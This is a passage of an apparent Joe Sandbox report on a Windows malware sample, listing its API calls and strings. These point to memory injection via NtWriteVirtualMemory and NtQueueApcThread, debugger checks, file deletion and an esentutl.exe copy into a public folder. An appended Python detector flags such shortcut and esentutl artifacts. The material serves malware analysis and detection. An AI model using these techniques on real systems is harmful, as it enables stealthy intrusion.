                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                          • String ID:
                                                          • API String ID: 3764614163-0
                                                          • Opcode ID: d26468430ccd821eb219e71989f0df07d9ffecffb1477917b21c3b93255d9c4a
                                                          • Instruction ID: e8420c104945df64d1083e9522e999341ef8384a0116834e78baffef3fb64886
                                                          • Opcode Fuzzy Hash: d26468430ccd821eb219e71989f0df07d9ffecffb1477917b21c3b93255d9c4a
                                                          • Instruction Fuzzy Hash: C621EC75A4020CBEEB50EAE4DD82FDEB7BDEB44B00F614466B704F75D0D7B0AA048A65

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02908814
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$CreateProcessUser
                                                          • String ID: CreateProcessAsUserW$Kernel32
                                                          • API String ID: 3130163322-2353454454
                                                          • Opcode ID: 2ab25c9bf07253820042cfb547c4e5dc3e34f08efc4b9ce2825b3eb75bcb4e5c
                                                          • Instruction ID: e1dd529cb2cbb7edeaa614cf30ed58d1f4d6fcecb874da78a75732943d02b836
                                                          • Opcode Fuzzy Hash: 2ab25c9bf07253820042cfb547c4e5dc3e34f08efc4b9ce2825b3eb75bcb4e5c
                                                          • Instruction Fuzzy Hash: 2011C5B5644248AFEB80EE9CDC81FAA77EDEB4C700F514461BA08D3280D634ED108B65
                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02907A9F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                          • API String ID: 4072585319-445027087
                                                          • Opcode ID: b7dcf1cfff199dbdf0a070df765ad8e05a5ced4f9d631d29be7ff09c8ca3690a
                                                          • Instruction ID: 5b285567f76c2680c2a7f64f41c29422efeabb90ed1c082bddc9a76d1ce86f58
                                                          • Opcode Fuzzy Hash: b7dcf1cfff199dbdf0a070df765ad8e05a5ced4f9d631d29be7ff09c8ca3690a
                                                          • Instruction Fuzzy Hash: 35111E7964420CBFEB44EFE9EC81EEEB7ADEB4C710F504461BA04D7680D670AE148B65
                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02907A9F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                          • API String ID: 4072585319-445027087
                                                          • Opcode ID: 3ceaac7fbf8add7030f563939cde0fe6b8ecaf24c3a3ebaf821e641f6ec91028
                                                          • Instruction ID: 560a0ebbafff178c582427db8417d6a14d33c942e9aa2e84e88ab6c8fe1f7d73
                                                          • Opcode Fuzzy Hash: 3ceaac7fbf8add7030f563939cde0fe6b8ecaf24c3a3ebaf821e641f6ec91028
                                                          • Instruction Fuzzy Hash: F3111E7964420CBFEB44EFD9EC81EEEB7ADEB4C710F504461BA04D7680D670AA148B65
                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907DEC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                          • String ID: Ntdll$yromeMlautriVetirW
                                                          • API String ID: 2719805696-3542721025
                                                          • Opcode ID: 54a1daee43509a1e9e4c5da3690b0961d8d4af8fe843192636f9ee8ddabe28fc
                                                          • Instruction ID: 1d607a0334de6a4e61a1b2dc46fb56f9d5d74d8dceaad7719cd3580df59716b6
                                                          • Opcode Fuzzy Hash: 54a1daee43509a1e9e4c5da3690b0961d8d4af8fe843192636f9ee8ddabe28fc
                                                          • Instruction Fuzzy Hash: 6601E979644309AFDB40EFD8EC81EABB7EDEB89710F504851BA08D7690D630AD148B65
                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02908761
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$QueueThread
                                                          • String ID: NtQueueApcThread$ntdll
                                                          • API String ID: 3075473611-1374908105
                                                          • Opcode ID: 0f1b4a35a10dcd79bdc434f3b2d44b8410f6131992b8e4dd410885eadcd256e9
                                                          • Instruction ID: a314a46b6e77b491bb72785fe49b4037d91c3d031d0b54858b23130781e16e68
                                                          • Opcode Fuzzy Hash: 0f1b4a35a10dcd79bdc434f3b2d44b8410f6131992b8e4dd410885eadcd256e9
                                                          • Instruction Fuzzy Hash: 7EE026B278420DAF9B80EEDDE885D9B7BECBB4D6507044401FA09D7241C670E9648B61
                                                          APIs
                                                          • RtlI.N(?,?,00000000,0290DC7E), ref: 0290DC2C
                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0290DC7E), ref: 0290DC42
                                                          • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0290DC7E), ref: 0290DC61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                           • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Path$DeleteFileNameName_
                                                          • String ID:
                                                          • API String ID: 4284456518-0
                                                          • Opcode ID: 1858dfa102572ee8f99bac9a97b3295ac2ec5dc4163ecf9050f2831ae2f9a3de
                                                          • Instruction ID: 0cb3151d3798165a4fc6b0607e4b08522ddd837767c75b642679d090cb2b02fc
                                                          • Opcode Fuzzy Hash: 1858dfa102572ee8f99bac9a97b3295ac2ec5dc4163ecf9050f2831ae2f9a3de
                                                          • Instruction Fuzzy Hash: A2016D79A4420CAEEB05EBE08DC2FCD77B9EB85704F5144A29200E60C1EBB4AB048B35
                                                          APIs
                                                            • Part of subcall function 028F4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 028F4F2E
                                                          • RtlI.N(?,?,00000000,0290DC7E), ref: 0290DC2C
                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0290DC7E), ref: 0290DC42
                                                          • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0290DC7E), ref: 0290DC61
                                                            • Part of subcall function 028F4C60: SysFreeString.OLEAUT32(0290F4A4), ref: 028F4C6E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                           • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: PathString$AllocDeleteFileFreeNameName_
                                                          • String ID:
                                                          • API String ID: 1530111750-0
                                                          • Opcode ID: 0c2222b1edfd8f1f42337401b2f4cb7a11ead052e1652df0e6200961e43839b6
                                                          • Instruction ID: e09b3a141a69a4ddc75a0ca6d9c0dc867e6c9ed6ce360e82447b03fe8f6206ab
                                                          • Opcode Fuzzy Hash: 0c2222b1edfd8f1f42337401b2f4cb7a11ead052e1652df0e6200961e43839b6
                                                          • Instruction Fuzzy Hash: 6B01217594020CBEEB01EBE4DD82FCEB3ADEB48700F5144A2A204E25C0EB746B048A75
                                                          APIs
                                                            • Part of subcall function 02906D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02906DB9,?,?,?,00000000), ref: 02906D99
                                                          • CoCreateInstance.OLE32(?,00000000,00000005,02906EAC,00000000,00000000,02906E2B,?,00000000,02906E9B), ref: 02906E17
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                           • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFromInstanceProg
                                                          • String ID:
                                                          • API String ID: 2151042543-0
                                                          • Opcode ID: 1584680628f69887b19681a49192cb992e221d565d491793e4b889180627b76b
                                                          • Instruction ID: 6f837018947d0347843e1dab1b57296295b6aedea8149b8d92b92697b7eec65a
                                                          • Opcode Fuzzy Hash: 1584680628f69887b19681a49192cb992e221d565d491793e4b889180627b76b
                                                          • Instruction Fuzzy Hash: 2D01F235208708AEF711EF65DCA286FBBFDEB89B00B510875F505E26C0E731AA30C861
                                                          APIs
                                                          • InetIsOffline.URL(00000000,00000000,0291B784,?,?,?,00000000,00000000), ref: 0290F801
                                                            • Part of subcall function 029089D0: FreeLibrary.KERNEL32(74D10000,00000000,00000000,00000000,00000000,0297738C,Function_0000662C,00000004,0297739C,0297738C,05F5E103,00000040,029773A0,74D10000,00000000,00000000), ref: 02908AAA
                                                            • Part of subcall function 0290F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,0290FAEB,UacInitialize,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,ScanString,02977380,0291B7B8,Initialize), ref: 0290F6EE
                                                            • Part of subcall function 0290F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0290F700
                                                            • Part of subcall function 0290F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 0290F754
                                                            • Part of subcall function 0290F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0290F766
                                                            • Part of subcall function 0290F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0290F77D
                                                            • Part of subcall function 028F7E5C: GetFileAttributesA.KERNEL32(00000000,?,0291041F,ScanString,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanString,02977380,0291B7B8,UacScan,02977380,0291B7B8,UacInitialize), ref: 028F7E67
                                                            • Part of subcall function 028FC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A6B8B8,?,02910751,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,OpenSession), ref: 028FC37B
                                                            • Part of subcall function 0290DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DE40), ref: 0290DDAB
                                                            • Part of subcall function 0290DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0290DE40), ref: 0290DDDB
                                                            • Part of subcall function 0290DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0290DDF0
                                                            • Part of subcall function 0290DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0290DE1C
                                                            • Part of subcall function 0290DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0290DE25
                                                            • Part of subcall function 028F7E80: GetFileAttributesA.KERNEL32(00000000,?,0291356F,ScanString,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,Initialize), ref: 028F7E8B
                                                            • Part of subcall function 028F8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,0291370D,OpenSession,02977380,0291B7B8,ScanString,02977380,0291B7B8,Initialize,02977380,0291B7B8,ScanString,02977380,0291B7B8), ref: 028F8055
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                           • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                           • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                          • API String ID: 297057983-2894825931
                                                          • Opcode ID: 534c718d8992d224c829bfd4d7c35b8314956717e20637cb839c2b3ca978453e
                                                          • Instruction ID: c4537a1708da32be1905d6aa8bfe892a09e7f5fefd0f1ffa71eb687c6e3a0aed
                                                          • Opcode Fuzzy Hash: 534c718d8992d224c829bfd4d7c35b8314956717e20637cb839c2b3ca978453e
                                                          • Instruction Fuzzy Hash: F914E93CB0421DCFDB50EB68DC90ADB73BABF85304F5040E69609EB654DA30AE958F56
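The String ID list of this function carries the pieces of two on-disk artifacts: a .url shortcut ([InternetShortcut], URL=file:", IconIndex=, HotKey=, C:\\Users\\Public\\Libraries\\) and a LOLBin file copy (C:\\Windows\\System32\\esentutl.exe /y, /d, /o). The Python below is an added example, not part of the Joe Sandbox report: it parses both artifacts and flags a shortcut whose file: target lives in a user-writable directory, and an esentutl /y copy whose destination is user-writable or whose file name differs from the source (the report's "copies cmd.exe with a different name" behaviour). The sample .url text and command line are constructed; the name placeholder.pif and the list of user-writable prefixes are assumptions of this example.

```python
import ntpath
import re
from typing import Dict, Optional, Tuple
from urllib.parse import unquote

# Locations a standard user can write to. An assumption of this example; the
# report's own string is C:\Users\Public\Libraries\.
USER_WRITABLE_PREFIXES = ("c:\\users\\public\\", "c:\\programdata\\")

# Constructed sample inputs (placeholder.pif is a made-up name, not a file from the report).
SAMPLE_URL_FILE = (
    "[InternetShortcut]\n"
    "URL=file:\"C:\\Users\\Public\\Libraries\\placeholder.pif\"\n"
    "IconIndex=0\n"
    "HotKey=0\n"
)
SAMPLE_ESENTUTL = (
    "C:\\Windows\\System32\\esentutl.exe /y C:\\Windows\\System32\\cmd.exe "
    "/d C:\\Users\\Public\\Libraries\\placeholder.pif /o"
)


def parse_internet_shortcut(text: str) -> Dict[str, str]:
    """Return the key/value pairs of the [InternetShortcut] section, keys lower-cased."""
    section, values = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip().lower()] = value.strip()
    return values


def file_url_to_path(url: str) -> Optional[str]:
    """Convert file:"C:\\x\\y" or file:///C:/x/y to a Windows path; None for non-file URLs."""
    if not url.lower().startswith("file:"):
        return None
    rest = unquote(url[len("file:"):].strip().strip('"')).lstrip("/")
    return rest.replace("/", "\\")


def parse_esentutl_copy(cmdline: str) -> Optional[Tuple[str, str]]:
    """Recognise `esentutl.exe /y <src> /d <dst> [/o]` and return (src, dst)."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    if not tokens or ntpath.basename(tokens[0]).lower() != "esentutl.exe":
        return None
    pos = {t.lower(): i for i, t in enumerate(tokens) if t.startswith("/")}
    if "/y" not in pos or "/d" not in pos:
        return None
    try:
        return tokens[pos["/y"] + 1], tokens[pos["/d"] + 1]
    except IndexError:
        return None


def is_user_writable(path: str) -> bool:
    p = path.lower()
    return p.startswith(USER_WRITABLE_PREFIXES) or "\\appdata\\local\\temp\\" in p


def assess_shortcut(text: str) -> Optional[str]:
    """Flag a .url whose URL=file: target lives in a user-writable directory."""
    target = file_url_to_path(parse_internet_shortcut(text).get("url", ""))
    if target and is_user_writable(target):
        return "url-shortcut-to-user-writable: " + target
    return None


def assess_esentutl(cmdline: str) -> Optional[str]:
    """Flag an esentutl /y copy into a user-writable directory or under a changed file name."""
    parsed = parse_esentutl_copy(cmdline)
    if parsed is None:
        return None
    src, dst = parsed
    renamed = ntpath.basename(src).lower() != ntpath.basename(dst).lower()
    if is_user_writable(dst) or renamed:
        return "esentutl-copy: %s -> %s%s" % (src, dst, " (renamed)" if renamed else "")
    return None


if __name__ == "__main__":
    print(assess_shortcut(SAMPLE_URL_FILE))
    print(assess_esentutl(SAMPLE_ESENTUTL))
```

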